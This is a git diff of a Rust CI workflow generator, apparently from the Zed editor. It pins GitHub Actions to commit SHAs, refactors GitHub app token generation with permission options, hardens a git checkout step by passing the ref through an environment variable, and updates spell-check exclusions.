"93cb6efe18208431cddfb8368fd83d5badbf9bfd", // v5.0.1 ) // prevent checkout action from running `git clean -ffdx` which // would delete the target directory @@ -126,22 +128,12 @@ impl From for Step { FetchDepth::Full => step.add_with(("fetch-depth", 0)), FetchDepth::Custom(depth) => step.add_with(("fetch-depth", depth)), }) - .map(|step| match value.token { - Some(token) => step.add_with(("token", token)), - None => step, - }) - .map(|step| match value.path { - Some(path) => step.add_with(("path", path)), - None => step, - }) - .map(|step| match value.repository { - Some(repository) => step.add_with(("repository", repository)), - None => step, - }) - .map(|step| match value.ref_ { - Some(ref_) => step.add_with(("ref", ref_)), - None => step, + .when_some(value.path, |step, path| step.add_with(("path", path))) + .when_some(value.repository, |step, repository| { + step.add_with(("repository", repository)) }) + .when_some(value.ref_, |step, ref_| step.add_with(("ref", ref_))) + .when_some(value.token, |step, token| step.add_with(("token", token))) } } @@ -185,7 +177,11 @@ pub fn cargo_fmt() -> Step { } pub fn cargo_install_nextest() -> Step { - named::uses("taiki-e", "install-action", "nextest") + named::uses( + "taiki-e", + "install-action", + "921e2c9f7148d7ba14cd819f417db338f63e733c", // nextest + ) } pub fn setup_cargo_config(platform: Platform) -> Step { @@ -223,17 +219,28 @@ pub fn clear_target_dir_if_large(platform: Platform) -> Step { } } -pub fn clippy(platform: Platform) -> Step { +pub fn clippy(platform: Platform, target: Option<&str>) -> Step { match platform { Platform::Windows => named::pwsh("./script/clippy.ps1"), - _ => named::bash("./script/clippy"), + _ => match target { + Some(target) => named::bash(format!("./script/clippy --target {target}")), + None => named::bash("./script/clippy"), + }, } } +pub fn install_rustup_target(target: &str) -> Step { + named::bash(format!("rustup target add {target}")) +} + pub fn cache_rust_dependencies_namespace() -> Step { - named::uses("namespacelabs", "nscloud-cache-action", "v1") - .add_with(("cache", "rust")) - .add_with(("path", "~/.rustup")) + named::uses( + "namespacelabs", + "nscloud-cache-action", + "a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9", // v1 + ) + .add_with(("cache", "rust")) + .add_with(("path", "~/.rustup")) } pub fn setup_sccache(platform: Platform) -> Step { @@ -247,6 +254,10 @@ pub fn setup_sccache(platform: Platform) -> Step { .add_env(("SCCACHE_BUCKET", SCCACHE_R2_BUCKET)) } +pub fn cargo_build_visual_tests() -> Step { + named::bash("cargo build -p zed --bin zed_visual_test_runner --features visual-tests") +} + pub fn show_sccache_stats(platform: Platform) -> Step { match platform { // Use $env:RUSTC_WRAPPER (absolute path) because GITHUB_PATH changes @@ -260,32 +271,36 @@ pub fn show_sccache_stats(platform: Platform) -> Step { } pub fn cache_nix_dependencies_namespace() -> Step { - named::uses("namespacelabs", "nscloud-cache-action", "v1").add_with(("cache", "nix")) + named::uses( + "namespacelabs", + "nscloud-cache-action", + "a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9", // v1 + ) + .add_with(("cache", "nix")) } pub fn cache_nix_store_macos() -> Step { // On macOS, `/nix` is on a read-only root filesystem so nscloud's `cache: nix` // cannot mount or symlink there. Instead we cache a user-writable directory and // use nix-store --import/--export in separate steps to transfer store paths. - named::uses("namespacelabs", "nscloud-cache-action", "v1").add_with(("path", "~/nix-cache")) + named::uses( + "namespacelabs", + "nscloud-cache-action", + "a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9", // v1 + ) + .add_with(("path", "~/nix-cache")) } pub fn setup_linux() -> Step { named::bash("./script/linux") } -fn install_mold() -> Step { - named::bash("./script/install-mold") -} - fn download_wasi_sdk() -> Step { named::bash("./script/download-wasi-sdk") } pub(crate) fn install_linux_dependencies(job: Job) -> Job { - job.add_step(setup_linux()) - .add_step(install_mold()) - .add_step(download_wasi_sdk()) + job.add_step(setup_linux()).add_step(download_wasi_sdk()) } pub fn script(name: &str) -> Step { @@ -498,20 +513,142 @@ pub mod named { } pub fn git_checkout(ref_name: &dyn std::fmt::Display) -> Step { - named::bash(&format!( - "git fetch origin {ref_name} && git checkout {ref_name}" - )) + named::bash(r#"git fetch origin "$REF_NAME" && git checkout "$REF_NAME""#) + .add_env(("REF_NAME", ref_name.to_string())) } -pub fn authenticate_as_zippy() -> (Step, StepOutput) { - let step = named::uses( - "actions", - "create-github-app-token", - "bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1", - ) - .add_with(("app-id", vars::ZED_ZIPPY_APP_ID)) - .add_with(("private-key", vars::ZED_ZIPPY_APP_PRIVATE_KEY)) - .id("get-app-token"); - let output = StepOutput::new(&step, "token"); - (step, output) +/// Non-exhaustive list of the permissions to be set for a GitHub app token. +/// +/// See https://github.com/actions/create-github-app-token?tab=readme-ov-file#permission-permission-name +/// and beyond for a full list of available permissions. +#[allow(unused)] +pub(crate) enum TokenPermissions { + Contents, + Issues, + PullRequests, + Workflows, +} + +impl TokenPermissions { + pub fn environment_name(&self) -> &'static str { + match self { + TokenPermissions::Contents => "permission-contents", + TokenPermissions::Issues => "permission-issues", + TokenPermissions::PullRequests => "permission-pull-requests", + TokenPermissions::Workflows => "permission-workflows", + } + } +} + +pub(crate) struct GenerateAppToken<'a> { + job_name: String, + app_id: &'a str, + app_secret: &'a str, + repository_target: Option, + permissions: Option>, +} + +impl<'a> GenerateAppToken<'a> { + pub fn for_repository(self, repository_target: RepositoryTarget) -> Self { + Self { + repository_target: Some(repository_target), + ..self + } + } + + pub fn with_permissions(self, permissions: impl Into>) -> Self { + Self { + permissions: Some(permissions.into()), + ..self + } + } +} + +impl<'a> From> for (Step, StepOutput) { + fn from(token: GenerateAppToken<'a>) -> Self { + let step = Step::new(token.job_name) + .uses( + "actions", + "create-github-app-token", + "f8d387b68d61c58ab83c6c016672934102569859", + ) + .id("generate-token") + .add_with( + Input::default() + .add("app-id", token.app_id) + .add("private-key", token.app_secret) + .when_some( + token.repository_target, + |input, + RepositoryTarget { + owner, + repositories, + }| { + input + .when_some(owner, |input, owner| input.add("owner", owner)) + .when_some(repositories, |input, repositories| { + input.add("repositories", repositories) + }) + }, + ) + .when_some(token.permissions, |input, permissions| { + permissions + .into_iter() + .fold(input, |input, (permission, level)| { + input.add( + permission.environment_name(), + serde_json::to_value(&level).unwrap_or_default(), + ) + }) + }), + ); + + let generated_token = StepOutput::new(&step, "token"); + (step, generated_token) + } +} + +pub(crate) struct RepositoryTarget { + owner: Option, + repositories: Option, +} + +impl RepositoryTarget { + pub fn new(owner: T, repositories: &[&str]) -> Self { + Self { + owner: Some(owner.to_string()), + repositories: Some(repositories.join("\n")), + } + } + + pub fn current() -> Self { + Self { + owner: None, + repositories: None, + } + } +} + +pub(crate) fn generate_token<'a>( + app_id_source: &'a str, + app_secret_source: &'a str, +) -> GenerateAppToken<'a> { + generate_token_with_job_name(app_id_source, app_secret_source) +} + +pub fn authenticate_as_zippy() -> GenerateAppToken<'static> { + generate_token_with_job_name(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY) +} + +fn generate_token_with_job_name<'a>( + app_id_source: &'a str, + app_secret_source: &'a str, +) -> GenerateAppToken<'a> { + GenerateAppToken { + job_name: function_name(1), + app_id: app_id_source, + app_secret: app_secret_source, + repository_target: None, + permissions: None, + } } diff --git a/tooling/xtask/src/tasks/workflows/vars.rs b/tooling/xtask/src/tasks/workflows/vars.rs index aa8fb0a4056a53807cd4b2f12f331cb9d4d0a235..b3f8bdf56e9bb0f93f81992fbc61dab2b9754e63 100644 --- a/tooling/xtask/src/tasks/workflows/vars.rs +++ b/tooling/xtask/src/tasks/workflows/vars.rs @@ -156,14 +156,31 @@ pub(crate) struct StepOutput { impl StepOutput { pub fn new(step: &Step, name: &'static str) -> Self { - Self { - name, - step_id: step - .value - .id - .clone() - .expect("Steps that produce outputs must have an ID"), - } + let step_id = step + .value + .id + .clone() + .expect("Steps that produce outputs must have an ID"); + + assert!( + step.value + .run + .as_ref() + .is_none_or(|run_command| run_command.contains(name)), + "Step Output name {name} must occur at least once in run command with ID {step_id}!" + ); + + Self { name, step_id } + } + + pub fn new_unchecked(step: &Step, name: &'static str) -> Self { + let step_id = step + .value + .id + .clone() + .expect("Steps that produce outputs must have an ID"); + + Self { name, step_id } } pub fn expr(&self) -> String { diff --git a/typos.toml b/typos.toml index 6f76cc75d25add39d841c07bbde82f93514adac5..959b5fc6f73477369572cdca3ff95d12b43f5ee1 100644 --- a/typos.toml +++ b/typos.toml @@ -4,6 +4,9 @@ ignore-hidden = false extend-exclude = [ ".git/", + # Typewriter model names used for agent branch names aren't typos. + "crates/agent_ui/src/branch_names.rs", + # Contributor names aren't typos. ".mailmap", @@ -42,10 +45,10 @@ extend-exclude = [ "crates/gpui_windows/src/window.rs", # Some typos in the base mdBook CSS. "docs/theme/css/", + # Automatically generated JS. + "docs/theme/c15t@*.js", # Spellcheck triggers on `|Fixe[sd]|` regex part. "script/danger/dangerfile.ts", - # Eval examples for prompts and criteria - "crates/eval/src/examples/", # File type extensions are not typos "crates/zed/resources/windows/zed.iss", # typos-cli doesn't understand our `vˇariable` markup @@ -87,6 +90,10 @@ extend-ignore-re = [ # AMD GPU Services "ags", # AMD GPU Services - "AGS" + "AGS", + # "noet" is a vim variable (ideally to ignore locally) + "noet", + # Yarn Plug'n'Play + "PnP" ] check-filename = true

Some text strong link